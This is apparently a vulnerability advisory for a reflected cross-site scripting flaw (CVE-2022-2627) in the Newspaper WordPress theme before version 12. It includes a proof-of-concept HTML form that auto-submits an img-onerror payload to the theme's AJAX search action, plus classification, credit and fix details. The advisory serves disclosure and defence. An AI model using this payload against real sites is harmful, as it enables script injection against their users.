Themes Vulnerabilities

Newspaper < 12 - Reflected Cross-Site Scripting

Description

The theme does not sanitise a parameter before outputting it back in an HTML attribute via an AJAX action, leading to a Reflected Cross-Site Scripting.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="td_ajax_search" />
      <input type="hidden" name="td_string" value="<img src=a onerror=alert(/XSS/)>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Themes

Newspaper
Fixed in 12

References

CVE
CVE-2022-2627

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Ramon Dunker
Submitter
Ramon Dunker
Submitter website
https://ramondunker.nl
Submitter twitter
ramondunker
Verified
Yes
WPVDB ID
038327d0-568f-4011-9b7e-3da39e8b6aea

Timeline

Publicly Published
2022-10-10 (about 1 years ago)
Added
2022-10-10 (about 1 years ago)
Last Updated
2022-10-10 (about 1 years ago)

Other

Published
Title
Published
2021-08-16
Title
Amazon Auto Links < 4.6.20 - Reflected Cross-Site Scripting
Published
2017-07-30
Title
WP Live Chat Support < 7.1.05 - Cross-Site Scripting (XSS)
Published
2023-09-27
Title
Magic Action Box <= 2.17.2 - Contributor+ Stored XSS
Published
2012-05-15
Title
Leaflet <= 0.0.1 - Cross Site Scripting
Published
2023-11-07
Title
WPDBSpringClean <= 1.6 - Reflected XSS